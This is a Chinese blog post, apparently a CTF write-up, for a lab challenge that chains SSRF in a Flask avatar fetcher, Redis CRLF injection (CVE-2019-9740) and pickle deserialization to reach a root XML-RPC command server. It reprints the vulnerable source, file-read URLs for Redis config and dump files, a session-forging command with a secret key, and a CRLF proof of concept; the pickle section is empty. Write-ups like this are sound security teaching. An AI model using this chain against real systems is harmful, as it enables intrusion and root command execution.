mobile wallpaper 1mobile wallpaper 2mobile wallpaper 3mobile wallpaper 4mobile wallpaper 5mobile wallpaper 6
553 字
2 分钟
2026-软件系统安全赛-华东赛区
2026-03-14

爆零了😭8个小时盯一题,非常接近,死于pickle不熟练。

auth#

靶机有flask(低权限),里面有redis(有密码)。python有反序列化洞,但是需要通过redis写入序列化数据。里面还有个MCP-Server(root)。思路略复杂,分为两步。

  1. 通过SSRF读取本地Redis的dump文件,获取flask的secret_key,伪造Session提前到admin(可以触发反序列化)

  2. SSRF操作Redis写入序列化数据,触发Pickle反序列化RCE,构造XML-RPC请求mcp,以root权限执行读取flag。

审计#

app.py

from flask import Flask, request, jsonify, render_template_string, session, redirect, url_for
import redis
import pickle
import requests
import base64
import os
import io
import datetime
import urllib.request
import urllib.error
import secrets
import json
app = Flask(__name__, static_folder='static', static_url_path='/static')
def render_page(title, content, username=None, role=None, show_nav=True):
"""生成带有样式的HTML页面
Args:
title: 页面标题
content: 主要内容HTML
username: 当前用户名(可选)
role: 用户角色(可选)
show_nav: 是否显示导航(默认True)
"""
# 导航菜单
nav_menu = ''
if show_nav:
if username:
nav_menu = f'''
<nav>
<ul>
<li><a href="/home">用户中心</a></li>
<li><a href="/profile">个人属性</a></li>
'''
if role == 'admin':
nav_menu += '''
<li><a href="/admin/online-users">在线用户</a></li>
<li><a href="/admin/users">注册用户</a></li>
'''
nav_menu += f'''
<li><a href="/logout">退出登录</a></li>
</ul>
</nav>
'''
else:
nav_menu = '''
<nav>
<ul>
<li><a href="/login">登录</a></li>
<li><a href="/register">注册</a></li>
</ul>
</nav>
'''
# 用户信息显示
user_info = ''
if username:
user_info = f'<div class="user-info">欢迎, {username}! (角色: {role})</div>'
html = f'''
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>{title} - auth</title>
<link rel="stylesheet" href="/static/style.css">
<link rel="icon" href="data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22 viewBox=%220 0 100 100%22><text y=%22.9em%22 font-size=%2290%22>🔒</text></svg>">
</head>
<body>
<div class="container">
<header>
<h1>{title}</h1>
{user_info}
</header>
{nav_menu}
<main>
{content}
</main>
<footer>
<p>© 2026 auth | 简约安全设计</p>
</footer>
</div>
<script src="/static/script.js"></script>
</body>
</html>
'''
return html
class User:
def __init__(self, username, password=None):
self.username = username
self.password = password
self.role = "user"
self.created_at = "2026-01-20"
def __repr__(self):
return f"User(username={self.username!r}, role={self.role!r})"
class OnlineUser:
"""在线用户类,用于保存登录状态信息"""
def __init__(self, username, role="user"):
self.username = username
self.role = role
self.login_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
# 设置失效时间为登录时间后1小时
expiry = datetime.datetime.now() + datetime.timedelta(hours=1)
self.expiry_time = expiry.strftime("%Y-%m-%d %H:%M:%S")
self.ip_address = request.remote_addr if request else "unknown"
def __repr__(self):
return f"OnlineUser(username={self.username!r}, role={self.role!r}, login_time={self.login_time!r}, expiry_time={self.expiry_time!r})"
class RestrictedUnpickler(pickle.Unpickler):
"""限制性的Unpickler,只允许OnlineUser类和安全的内置函数"""
ALLOWED_CLASSES = {
'__main__.OnlineUser': OnlineUser,
'builtins': __builtins__
}
def find_class(self, module: str, name: str):
full_name = f"{module}.{name}"
# 允许builtins模块的基础类型和安全函数
if module == "builtins" and name in ["getattr", "setattr", "dict", "list", "tuple"]:
return getattr(__builtins__, name)
# 白名单检查
if full_name in self.ALLOWED_CLASSES:
return self.ALLOWED_CLASSES[full_name]
raise pickle.UnpicklingError(f"Class '{full_name}' is not allowed")
# Redis配置
CONFIG_FILE_PATH = '/opt/app_config/redis_config.json'
# 默认配置值
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
REDIS_PASSWORD = '123456'
# 尝试从配置文件读取配置
try:
if os.path.exists(CONFIG_FILE_PATH):
print(f"从配置文件读取Redis配置: {CONFIG_FILE_PATH}")
with open(CONFIG_FILE_PATH, 'r') as config_file:
config = json.load(config_file)
# 从配置文件获取配置值,如果不存在则使用默认值
REDIS_HOST = config.get('redis_host', REDIS_HOST)
REDIS_PORT = config.get('redis_port', REDIS_PORT)
REDIS_PASSWORD = config.get('redis_password', REDIS_PASSWORD)
print(f"配置文件读取成功: host={REDIS_HOST}, port={REDIS_PORT}")
try:
os.remove(CONFIG_FILE_PATH)
print(f"配置文件已删除: {CONFIG_FILE_PATH}")
except Exception as delete_error:
print(f"警告:无法删除配置文件 {CONFIG_FILE_PATH}: {delete_error}")
else:
print(f"配置文件不存在: {CONFIG_FILE_PATH},使用默认Redis配置")
except Exception as config_error:
print(f"配置文件读取失败: {config_error},使用默认Redis配置")
# 连接Redis
try:
r = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, decode_responses=False)
r.ping()
print(f"Redis连接成功: {REDIS_HOST}:{REDIS_PORT}")
# 从Redis获取或生成随机secret_key
SECRET_KEY_REDIS_KEY = 'app:secret_key'
secret_key = r.get(SECRET_KEY_REDIS_KEY)
if secret_key is None:
# 生成新的随机密钥(64个字符的十六进制字符串)
secret_key = secrets.token_hex(32)
r.set(SECRET_KEY_REDIS_KEY, secret_key)
print(f"已生成新的随机secret_key并保存到Redis: {SECRET_KEY_REDIS_KEY}")
else:
# Redis返回的是bytes,需要解码为字符串
if isinstance(secret_key, bytes):
secret_key = secret_key.decode('utf-8')
print(f"从Redis加载现有的secret_key: {SECRET_KEY_REDIS_KEY}")
# 设置Flask应用的secret_key
app.secret_key = secret_key
print(f"Flask secret_key已设置(长度: {len(secret_key)})")
except Exception as e:
print(f"Redis连接失败: {e}")
r = None
@app.route('/')
def index():
return redirect(url_for('login'))
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
username = request.form.get('username', '')
password = request.form.get('password', '')
if not username or not password:
return '用户名和密码不能为空'
# 检查用户是否存在
if r is None:
return 'Redis连接失败,无法验证用户'
# 从Redis获取用户密码哈希
stored_password = r.hget(f'user:{username}', 'password')
if stored_password is None:
return '用户不存在或密码错误'
# 简单密码验证
if stored_password.decode('utf-8') != password:
return '用户不存在或密码错误'
# 登录成功,设置session
session['username'] = username
session['logged_in'] = True
# 获取用户角色
role_data = r.hget(f'user:{username}', 'role')
role = role_data.decode('utf-8') if role_data else 'user'
session['role'] = role
online_user = OnlineUser(username, role)
serialized_user = pickle.dumps(online_user)
r.set(f'online_user:{username}', serialized_user, ex=3600) # 设置1小时过期
return redirect(url_for('home'))
login_form = '''
<div class="form-container">
<h2>用户登录</h2>
<form method="post" class="login-form">
<div class="form-group">
<label for="username">用户名</label>
<input type="text" id="username" name="username" required placeholder="请输入用户名">
</div>
<div class="form-group">
<label for="password">密码</label>
<input type="password" id="password" name="password" required placeholder="请输入密码">
</div>
<div class="form-group">
<button type="submit" class="btn btn-success" style="width: 100%; padding: 12px;">登录</button>
</div>
</form>
<div class="text-center mt-20">
<p>还没有账号? <a href="/register" class="btn btn-secondary btn-small">注册新账户</a></p>
</div>
</div>
'''
return render_page('登录', login_form, show_nav=False)
# 用户注册
@app.route('/register', methods=['GET', 'POST'])
def register():
if request.method == 'POST':
username = request.form.get('username', '')
password = request.form.get('password', '')
confirm_password = request.form.get('confirm_password', '')
name = request.form.get('name', '')
age = request.form.get('age', '')
phone = request.form.get('phone', '')
if not username or not password:
return '用户名和密码不能为空'
if password != confirm_password:
return '两次输入的密码不一致'
if r is None:
return 'Redis连接失败,无法注册用户'
# 检查用户是否已存在
if r.hexists(f'user:{username}', 'password'):
return '用户名已存在'
user_data = {
'password': password,
'role': 'user',
'created_at': '2026-01-20',
'name': name if name else username, # 如果未提供姓名,默认使用用户名
'age': age if age else '0',
'phone': phone if phone else '未填写',
'avatar': '' # 默认头像为空
}
r.hset(f'user:{username}', mapping=user_data)
success_content = f'''
<div class="message message-success">
<h3>注册成功!</h3>
<p>用户 <strong>{username}</strong> 已成功注册。</p>
<p><a href="/login" class="btn btn-success mt-10">前往登录</a></p>
</div>
'''
return render_page('注册成功', success_content, show_nav=False)
register_form = '''
<div class="form-container">
<h2>用户注册</h2>
<form method="post" class="register-form">
<div class="form-group">
<label for="username">用户名 <span class="required">*</span></label>
<input type="text" id="username" name="username" required placeholder="请输入用户名">
</div>
<div class="form-group">
<label for="password">密码 <span class="required">*</span></label>
<input type="password" id="password" name="password" required placeholder="请输入密码">
</div>
<div class="form-group">
<label for="confirm_password">确认密码 <span class="required">*</span></label>
<input type="password" id="confirm_password" name="confirm_password" required placeholder="请再次输入密码">
</div>
<div class="form-group">
<label for="name">姓名</label>
<input type="text" id="name" name="name" placeholder="可选,默认为用户名">
</div>
<div class="form-group">
<label for="age">年龄</label>
<input type="number" id="age" name="age" min="0" max="150" placeholder="可选">
</div>
<div class="form-group">
<label for="phone">手机号码</label>
<input type="tel" id="phone" name="phone" placeholder="可选">
</div>
<div class="form-group">
<button type="submit" class="btn btn-success" style="width: 100%; padding: 12px;">注册</button>
</div>
</form>
<div class="text-center mt-20">
<p>已有账号? <a href="/login" class="btn btn-secondary btn-small">返回登录</a></p>
</div>
</div>
'''
return render_page('注册', register_form, show_nav=False)
@app.route('/home')
def home():
if not session.get('logged_in'):
return redirect(url_for('login'))
username = session.get('username', '访客')
role = session.get('role', 'user')
admin_link = ''
if role == 'admin':
admin_link = '<li><a href="/admin/online-users">管理在线用户</a> - 查看所有在线用户信息</li>\n <li><a href="/admin/users">管理注册用户</a> - 查看所有注册用户信息</li>'
main_content = f'''
<div class="dashboard">
<div class="welcome-message">
<h2>欢迎回来,{username}!</h2>
<p class="role-badge">角色: <span class="badge">{role}</span></p>
</div>
<div class="dashboard-cards">
<div class="card">
<h3>个人信息</h3>
<p>查看和编辑您的个人资料,包括头像上传</p>
<a href="/profile" class="btn btn-success mt-10">管理个人信息</a>
</div>
'''
if role == 'admin':
main_content += '''
<div class="card">
<h3>用户管理</h3>
<p>管理系统中的用户</p>
<div class="flex flex-column gap-10 mt-10">
<a href="/admin/online-users" class="btn btn-small">在线用户</a>
<a href="/admin/users" class="btn btn-small">注册用户</a>
</div>
</div>
'''
main_content += '''
</div>
<div class="quick-actions mt-30">
<h3>快速操作</h3>
<div class="flex gap-10">
<a href="/logout" class="btn btn-danger">退出登录</a>
</div>
</div>
</div>
'''
return render_page('用户中心', main_content, username, role)
@app.route('/admin/online-users')
def admin_online_users():
if not session.get('logged_in'):
return redirect(url_for('login'))
if session.get('role') != 'admin':
return '权限不足,需要管理员权限'
if r is None:
return 'Redis连接失败'
# 获取所有在线用户键
online_keys = r.keys('online_user:*')
if not online_keys:
return '没有在线用户'
users_html = '<h1>在线用户列表</h1><table border="1" style="border-collapse: collapse; width: 100%;">'
users_html += '<tr><th>用户名</th><th>角色</th><th>登录时间</th><th>失效时间</th><th>IP地址</th><th>状态</th></tr>'
for key in online_keys:
try:
serialized = r.get(key)
if serialized:
file = io.BytesIO(serialized)
unpickler = RestrictedUnpickler(file)
online_user = unpickler.load()
expiry_time = datetime.datetime.strptime(online_user.expiry_time, "%Y-%m-%d %H:%M:%S")
current_time = datetime.datetime.now()
status = '在线' if current_time < expiry_time else '已过期'
users_html += f'''
<tr>
<td>{online_user.username}</td>
<td>{online_user.role}</td>
<td>{online_user.login_time}</td>
<td>{online_user.expiry_time}</td>
<td>{online_user.ip_address}</td>
<td style="color: {'green' if status == '在线' else 'red'}">{status}</td>
</tr>
'''
except Exception as e:
users_html += f'<tr><td colspan="6">反序列化错误: {e}</td></tr>'
users_html += '</table>'
# 获取当前用户信息用于render_page
current_username = session.get('username', '')
current_role = session.get('role', '')
users_html += '''
<div class="admin-actions mt-30">
<a href="/admin/users" class="btn btn-secondary">查看注册用户</a>
<a href="/home" class="btn">返回用户中心</a>
</div>
'''
return render_page('在线用户管理', users_html, current_username, current_role)
@app.route('/admin/users')
def admin_users():
if not session.get('logged_in'):
return redirect(url_for('login'))
if session.get('role') != 'admin':
return '权限不足,需要管理员权限'
if r is None:
return 'Redis连接失败'
# 获取所有用户键
user_keys = r.keys('user:*')
if not user_keys:
return '没有注册用户'
users_html = '<h1>注册用户列表</h1><table border="1" style="border-collapse: collapse; width: 100%;">'
users_html += '<tr><th>用户名</th><th>角色</th><th>姓名</th><th>年龄</th><th>手机号码</th><th>创建时间</th></tr>'
for key in user_keys:
try:
user_data = r.hgetall(key)
if user_data:
user_info = {}
for field, value in user_data.items():
field_str = field.decode('utf-8') if isinstance(field, bytes) else field
value_str = value.decode('utf-8') if isinstance(value, bytes) else value
user_info[field_str] = value_str
username = key.decode('utf-8').replace('user:', '') if isinstance(key, bytes) else key.replace('user:', '')
role = user_info.get('role', 'user')
name = user_info.get('name', username)
age = user_info.get('age', '0')
phone = user_info.get('phone', '未填写')
created_at = user_info.get('created_at', '未知')
users_html += f'''
<tr>
<td>{username}</td>
<td>{role}</td>
<td>{name}</td>
<td>{age}</td>
<td>{phone}</td>
<td>{created_at}</td>
</tr>
'''
except Exception as e:
users_html += f'<tr><td colspan="6">获取用户信息错误: {e}</td></tr>'
users_html += '</table>'
current_username = session.get('username', '')
current_role = session.get('role', '')
users_html += '''
<div class="admin-actions mt-30">
<a href="/admin/online-users" class="btn btn-secondary">查看在线用户</a>
<a href="/home" class="btn">返回用户中心</a>
</div>
'''
return render_page('注册用户管理', users_html, current_username, current_role)
@app.route('/profile')
def profile():
if not session.get('logged_in'):
return redirect(url_for('login'))
username = session.get('username', '')
if not username or r is None:
return '无法获取用户信息'
# 从Redis获取用户信息
user_data = r.hgetall(f'user:{username}')
if not user_data:
return '用户信息不存在'
user_info = {}
for key, value in user_data.items():
user_info[key.decode('utf-8') if isinstance(key, bytes) else key] = \
value.decode('utf-8') if isinstance(value, bytes) else value
name = user_info.get('name', username)
age = user_info.get('age', '0')
phone = user_info.get('phone', '未填写')
avatar = user_info.get('avatar', '')
role = user_info.get('role', 'user')
created_at = user_info.get('created_at', '未知')
# 判断头像类型:URL或本地文件
if avatar.startswith('http://') or avatar.startswith('https://'):
avatar_src = avatar
else:
avatar_src = ''
# 构建个人资料内容
profile_content = f'''
<div class="profile-container">
<div class="profile-header">
<h2>个人资料</h2>
<p>查看和管理您的个人信息</p>
</div>
<div class="profile-content">
<div class="profile-avatar-section">
<div class="avatar-preview">
<img src="{avatar_src}" alt="用户头像" id="profile-avatar">
</div>
<div class="avatar-actions">
<a href="/profile/avatar" class="btn btn-success">更换头像</a>
</div>
</div>
<div class="profile-info-section">
<h3>基本信息</h3>
<table class="profile-info-table">
<tr>
<th>用户名</th>
<td>{username}</td>
</tr>
<tr>
<th>姓名</th>
<td>{name}</td>
</tr>
<tr>
<th>年龄</th>
<td>{age}</td>
</tr>
<tr>
<th>手机号码</th>
<td>{phone}</td>
</tr>
<tr>
<th>角色</th>
<td><span class="badge">{role}</span></td>
</tr>
<tr>
<th>注册时间</th>
<td>{created_at}</td>
</tr>
</table>
<div class="profile-actions mt-30">
<a href="/profile/edit" class="btn btn-success">编辑个人资料</a>
<a href="/home" class="btn btn-secondary">返回用户中心</a>
</div>
</div>
</div>
</div>
'''
return render_page('个人属性', profile_content, username, role)
# 编辑个人属性
@app.route('/profile/edit', methods=['GET', 'POST'])
def edit_profile():
if not session.get('logged_in'):
return redirect(url_for('login'))
username = session.get('username', '')
if not username or r is None:
return '无法获取用户信息'
if request.method == 'POST':
# 获取表单数据
name = request.form.get('name', '')
age = request.form.get('age', '')
phone = request.form.get('phone', '')
# 验证年龄是否为数字
if age and not age.isdigit():
return '年龄必须是数字'
# 获取当前用户信息
current_data = r.hgetall(f'user:{username}')
if not current_data:
return '用户信息不存在'
# 更新用户信息(保留密码和角色等字段)
updates = {}
if name:
updates['name'] = name
if age:
updates['age'] = age
if phone:
updates['phone'] = phone
# 只更新有变化的字段
if updates:
r.hset(f'user:{username}', mapping=updates)
return redirect(url_for('profile'))
# GET请求,显示编辑表单
# 获取当前用户信息
user_data = r.hgetall(f'user:{username}')
if not user_data:
return '用户信息不存在'
# 解码字节数据为字符串
user_info = {}
for key, value in user_data.items():
user_info[key.decode('utf-8') if isinstance(key, bytes) else key] = \
value.decode('utf-8') if isinstance(value, bytes) else value
# 获取当前值
current_name = user_info.get('name', username)
current_age = user_info.get('age', '0')
current_phone = user_info.get('phone', '未填写')
# 构建编辑表单
edit_form = f'''
<div class="form-container">
<h2>编辑个人资料</h2>
<p>更新您的个人信息</p>
<form method="post" class="edit-form">
<div class="form-group">
<label for="name">姓名</label>
<input type="text" id="name" name="name" value="{current_name}" placeholder="请输入您的姓名">
</div>
<div class="form-group">
<label for="age">年龄</label>
<input type="number" id="age" name="age" value="{current_age}" min="0" max="150" placeholder="请输入您的年龄">
</div>
<div class="form-group">
<label for="phone">手机号码</label>
<input type="tel" id="phone" name="phone" value="{current_phone}" placeholder="请输入您的手机号码">
</div>
<div class="form-group">
<button type="submit" class="btn btn-success">保存修改</button>
<a href="/profile" class="btn btn-secondary" style="margin-left: 15px;">取消</a>
</div>
</form>
<div class="additional-actions mt-30">
<h3>其他操作</h3>
<div class="flex gap-10">
<a href="/profile/avatar" class="btn btn-small">更换头像</a>
<a href="/profile" class="btn btn-small">返回个人资料</a>
<a href="/home" class="btn btn-small">返回用户中心</a>
</div>
</div>
</div>
'''
return render_page('编辑个人属性', edit_form, username, session.get('role', 'user'))
# 退出登录
@app.route('/logout')
def logout():
session.clear()
return redirect(url_for('login'))
# 用户头像上传
@app.route('/profile/avatar', methods=['GET', 'POST'])
def upload_avatar():
# 检查用户是否登录
if not session.get('logged_in'):
return redirect(url_for('login'))
username = session.get('username', '')
if not username or r is None:
return '无法获取用户信息'
if request.method == 'GET':
# 显示上传表单
upload_form = f'''
<div class="upload-container">
<h2>上传头像</h2>
<div class="user-info mb-20">
<p><strong>当前用户:</strong> {username}</p>
</div>
<div class="upload-options">
<div class="upload-option">
<h3>方式一:上传图片文件</h3>
<div class="upload-form-card">
<form method="post" enctype="multipart/form-data" class="upload-form">
<div class="form-group">
<label for="avatar_file">选择图片文件</label>
<input type="file" id="avatar_file" name="avatar_file" accept="image/*" class="file-input">
<p class="help-text">支持 JPG, PNG, GIF 等图片格式</p>
</div>
<div class="form-group">
<button type="submit" name="upload_type" value="上传文件" class="btn btn-success">上传文件</button>
</div>
</form>
</div>
</div>
<div class="upload-option">
<h3>方式二:提供图片URL</h3>
<div class="upload-form-card">
<form method="post" class="upload-form">
<div class="form-group">
<label for="avatar_url">图片URL地址</label>
<input type="text" id="avatar_url" name="avatar_url" placeholder="请输入图片URL地址" class="url-input">
<p class="help-text">请输入有效的图片URL地址</p>
</div>
<div class="form-group">
<button type="submit" name="upload_type" value="从URL下载" class="btn btn-success">从URL下载</button>
</div>
</form>
</div>
</div>
</div>
<div class="upload-note mt-30">
<div class="message">
<p><strong>注意:</strong>上传的头像将显示在您的个人资料中。</p>
</div>
</div>
<div class="upload-actions mt-30">
<a href="/profile" class="btn btn-secondary">返回个人属性</a>
</div>
</div>
'''
return render_page('上传头像', upload_form, username, session.get('role', 'user'))
# POST请求处理
upload_type = request.form.get('upload_type')
if upload_type == '上传文件':
# 处理文件上传
if 'avatar_file' not in request.files:
return '请选择要上传的文件'
file = request.files['avatar_file']
if file.filename == '':
return '请选择有效的文件'
# 检查文件类型
if file.content_type and not file.content_type.startswith('image/'):
return '只能上传图片文件'
return '功能尚未开发'
elif upload_type == '从URL下载':
url = request.form.get('avatar_url', '')
if not url:
return '请提供图片URL'
try:
# 使用urllib处理URL请求
import urllib.parse
# 解析URL获取主机和端口信息
parsed = urllib.parse.urlparse(url)
host = parsed.hostname
port = parsed.port or (80 if parsed.scheme == 'http' else 443 if parsed.scheme == 'https' else None)
# 使用urllib.request.urlopen发送请求
req = urllib.request.Request(url)
# 发送请求并获取响应
response = urllib.request.urlopen(req, timeout=10)
response_data = response.read()
content_type = response.headers.get('Content-Type', '')
status_code = response.getcode()
r.hset(f'user:{username}', 'avatar', url)
data_size = len(response_data)
base64_data = base64.b64encode(response_data).decode('utf-8')
# 创建base64图片数据URI
# 如果content_type为空或无效,使用默认的image/png
display_content_type = content_type if content_type else 'image/png'
data_uri = f'data:{display_content_type};base64,{base64_data}'
# 统一显示结果,使用img标签展示base64编码的图片数据
unified_content = f'''
<div class="message">
<h2>图片预览</h2>
<div class="image-preview-container mt-20">
<div class="image-wrapper">
<img src="{data_uri}" alt="加载图片图片" style="max-width: 100%; max-height: 500px; border: 1px solid #ddd; border-radius: 4px;">
</div>
</div>
<div class="preview-actions mt-30">
<a href="/profile" class="btn btn-success">查看个人属性</a>
<a href="/profile/avatar" class="btn btn-secondary">继续上传</a>
</div>
</div>
'''
return render_page('图片预览', unified_content, username, session.get('role', 'user'))
except Exception as e:
error_content = f'''
<div class="message message-error">
<h2>处理失败</h2>
<div class="error-details">
<p><strong>错误信息:</strong> {e}</p>
</div>
<div class="error-actions mt-20">
<a href="/profile/avatar" class="btn btn-secondary">返回上传页面</a>
</div>
</div>
'''
return render_page('处理失败', error_content, username, session.get('role', 'user'))
else:
return '无效的上传类型'
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000, debug=False)

读取file:///etc/redis/redis.conf获取真实的Redis密码redispass123(没错,源码写死的那个是假的。。)

多注册、登录、登出,触发Redis dump(大概要满足redis操作大于一定值且没10分钟左右检测一次)。读取file:///var/lib/redis/dump.rdb可以获取明文的flask secret_key,伪造session拿到admin权限。

# app:secret_key@@e862df6072f59a75ee66fff76e2be0af4166ac929a805e39993061d6d18223e3
python flask_session_cookie_manager3.py encode -s '88ff640dd01faab118a11f5610a15f64285e2ca45adda81c46a1dbdedf4b2a4b' -t "{'logged_in':True,'role':'admin','username':'admin'}"

遍历file:///proc/[pid]/cmdline找到MCP服务器源码(文件名随机): mcp_server_secure_[hash].py

#!/usr/bin/env python3
import sys
import os
import subprocess
import json
import platform
import threading
import time
import functools
from xmlrpc.server import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler
from xmlrpc.server import SimpleXMLRPCDispatcher
import logging
# 设置日志
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger('MCP-Secure-Server')
class RequestHandler(SimpleXMLRPCRequestHandler):
rpc_paths = ('/RPC2',)
class SecureXMLRPCServer(SimpleXMLRPCServer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._introspection_enabled = False
def system_listMethods(self):
from xmlrpc.client import Fault
raise Fault(403, "Authentication failed")
def system_methodSignature(self, method_name):
from xmlrpc.client import Fault
raise Fault(403, "Authentication failed")
def system_methodHelp(self, method_name):
from xmlrpc.client import Fault
raise Fault(403, "Authentication failed")
def _dispatch(self, method, params):
if method.startswith('system.'):
from xmlrpc.client import Fault
raise Fault(403, "Authentication failed")
try:
return super()._dispatch(method, params)
except Fault as e:
raise Fault(403, "Authentication failed")
except Exception:
raise
class MCPServerSecure:
def __init__(self, host='0.0.0.0', port=54321):
self.host = host
self.port = port
self.server = SecureXMLRPCServer((host, port),
requestHandler=RequestHandler,
allow_none=True,
logRequests=False)
self.auth_token = "mcp_secure_token_b2rglxd"
self.register_methods()
logger.info(f"安全MCP服务器初始化完成,监听 {host}:{port}")
logger.info(f"认证令牌: {self.auth_token}")
logger.info(f"服务启动完成,进程ID: {os.getpid()}")
def verify_token(self, token):
"""验证令牌"""
return token == self.auth_token
def _auth_required(self, func):
"""认证装饰器"""
@functools.wraps(func)
def wrapper(token, *args, **kwargs):
if not self.verify_token(token):
return {'error': 'Authentication failed. Invalid token.'}
return func(*args, **kwargs)
return wrapper
def register_methods(self):
"""注册所有需要认证的RPC方法"""
# 所有方法都要求token作为第一个参数
self.server.register_function(
self._auth_required(self.get_server_info),
'get_server_info'
)
self.server.register_function(
self._auth_required(self.get_system_status),
'get_system_status'
)
self.server.register_function(
self._auth_required(self.list_files),
'list_files'
)
self.server.register_function(
self._auth_required(self.read_file),
'read_file'
)
self.server.register_function(
self._auth_required(self.execute_command),
'execute_command'
)
self.server.register_function(
self._auth_required(self.get_process_list),
'get_process_list'
)
self.server.register_function(
self._auth_required(self.service_control),
'service_control'
)
# ========== MCP 服务方法 ==========
def get_server_info(self):
"""获取MCP服务器信息"""
return {
'service': 'Secure Management Control Protocol Server',
'version': '2.0.0',
'host': self.host,
'port': self.port,
'elevated_privileges': os.geteuid() == 0,
'pid': os.getpid(),
'secure': True,
'auth_required': 'ALL_METHODS'
}
def get_system_status(self):
"""获取系统状态信息"""
try:
# CPU使用率
with open('/proc/loadavg', 'r') as f:
loadavg = f.read().strip()
# 内存信息
mem_info = {}
with open('/proc/meminfo', 'r') as f:
for line in f:
if 'MemTotal' in line or 'MemFree' in line or 'MemAvailable' in line:
key, value = line.split(':')
mem_info[key.strip()] = value.strip()
# 磁盘空间
disk_info = {}
try:
df_output = subprocess.check_output(['df', '-h', '/'],
stderr=subprocess.DEVNULL,
text=True)
lines = df_output.strip().split('\n')
if len(lines) > 1:
parts = lines[1].split()
if len(parts) >= 6:
disk_info = {
'filesystem': parts[0],
'size': parts[1],
'used': parts[2],
'available': parts[3],
'use_percent': parts[4],
'mounted': parts[5]
}
except:
disk_info = {'error': 'Unable to get disk info'}
return {
'system': platform.system(),
'node': platform.node(),
'release': platform.release(),
'version': platform.version(),
'machine': platform.machine(),
'processor': platform.processor(),
'load_average': loadavg,
'memory': mem_info,
'disk': disk_info,
'uptime': self._get_uptime(),
'time': time.strftime('%Y-%m-%d %H:%M:%S')
}
except Exception as e:
return {'error': str(e)}
def _get_uptime(self):
"""获取系统运行时间"""
try:
with open('/proc/uptime', 'r') as f:
uptime_seconds = float(f.readline().split()[0])
days = int(uptime_seconds // 86400)
hours = int((uptime_seconds % 86400) // 3600)
minutes = int((uptime_seconds % 3600) // 60)
return f"{days}d {hours}h {minutes}m"
except:
return "Unknown"
def list_files(self, path='.'):
"""列出指定目录下的文件和目录"""
try:
if '..' in path or path.startswith('/'):
sensitive_dirs = ['/etc', '/root', '/home', '/var']
for sensitive in sensitive_dirs:
if path.startswith(sensitive) and not path.startswith('/opt/mcp_service'):
return {'error': 'Access to sensitive directory restricted'}
files = []
for item in os.listdir(path):
item_path = os.path.join(path, item)
stat = os.stat(item_path)
files.append({
'name': item,
'path': item_path,
'is_dir': os.path.isdir(item_path),
'size': stat.st_size,
'modified': time.ctime(stat.st_mtime),
'permissions': oct(stat.st_mode)[-3:]
})
return {'path': path, 'files': files}
except Exception as e:
return {'error': str(e)}
def read_file(self, filepath):
"""读取文件内容"""
try:
if '..' in filepath or filepath.startswith('/etc/passwd') or 'flag' in filepath:
return {'error': 'Access to sensitive file restricted'}
with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
content = f.read(5000) # 限制读取大小
return {
'file': filepath,
'content': content,
'truncated': len(content) == 5000
}
except Exception as e:
return {'error': str(e)}
def execute_command(self, command):
"""执行系统命令"""
try:
logger.warning(f"执行命令: {command}")
result = subprocess.run(
command,
shell=True,
capture_output=True,
text=True,
timeout=10
)
return {
'command': command,
'returncode': result.returncode,
'stdout': result.stdout,
'stderr': result.stderr,
'success': result.returncode == 0
}
except subprocess.TimeoutExpired:
return {'error': 'Command execution timeout'}
except Exception as e:
return {'error': str(e)}
def get_process_list(self):
"""获取进程列表"""
try:
processes = []
# 使用ps命令获取进程信息
ps_output = subprocess.check_output(
['ps', 'aux'],
stderr=subprocess.DEVNULL,
text=True
)
lines = ps_output.strip().split('\n')
if len(lines) > 1:
header = lines[0]
for line in lines[1:21]: # 限制返回前20个进程
parts = line.split()
if len(parts) >= 11:
process = {
'user': parts[0],
'pid': parts[1],
'cpu': parts[2],
'mem': parts[3],
'vsz': parts[4],
'rss': parts[5],
'tty': parts[6],
'stat': parts[7],
'start': parts[8],
'time': parts[9],
'command': ' '.join(parts[10:])
}
processes.append(process)
return {'process_count': len(processes), 'processes': processes}
except Exception as e:
return {'error': str(e)}
def service_control(self, service_name, action):
"""控制系统服务(start/stop/restart/status)"""
try:
if action not in ['start', 'stop', 'restart', 'status']:
return {'error': 'Invalid action. Use start/stop/restart/status'}
result = subprocess.run(
['systemctl', action, service_name],
capture_output=True,
text=True,
timeout=10
)
return {
'service': service_name,
'action': action,
'returncode': result.returncode,
'stdout': result.stdout,
'stderr': result.stderr
}
except FileNotFoundError:
return {'error': 'systemctl not available'}
except Exception as e:
return {'error': str(e)}
def run(self):
"""运行MCP服务器"""
logger.info(f"启动安全MCP服务器,监听 {self.host}:{self.port}")
logger.info("所有方法需要认证令牌")
try:
self.server.serve_forever()
except KeyboardInterrupt:
logger.info("收到中断信号,关闭服务器")
finally:
self.server.server_close()
logger.info("MCP服务器已关闭")
def main():
"""主函数"""
# 检查运行权限
if os.geteuid() != 0:
logger.warning("警告:服务未以管理员权限运行,部分功能可能受限")
logger.warning("建议以管理员权限运行以获得完整功能")
# 创建并运行服务器
server = MCPServerSecure(host='0.0.0.0', port=54321)
server.run()
if __name__ == '__main__':
main()

SSRF#

搜索发现这个版本的urllib存在CRLF,CVE-2019-9740,贴个GitHub Issue链接

贴上原文:Attack Scenarios

  1. By crafting HTTP headers, it’s possible to fool some web services;
  2. It’s also possible to attack several simple services like Redis, memcached.

Let’s take Redis as a example here:

Adapt the script above to this:

#!/usr/bin/env python3
import sys
import urllib
import urllib.error
import urllib.request
host = "10.251.0.83:6379?\r\nSET test success\r\n"
url = "http://" + host + ":8080/test/?test=a"
try:
info = urllib.request.urlopen(url).info()
print(info)
except urllib.error.URLError as e:
print(e)
#end

We changed the injected header to a valid redis command, after executing this, we check the redis server:

127.0.0.1:6379> GET test
"success"
127.0.0.1:6379>

We can see that a “test” key was inserted successfully.

嗯就是这个原理,但是折腾仔细这些个\r\n真的真的非常折磨。

Pickle#

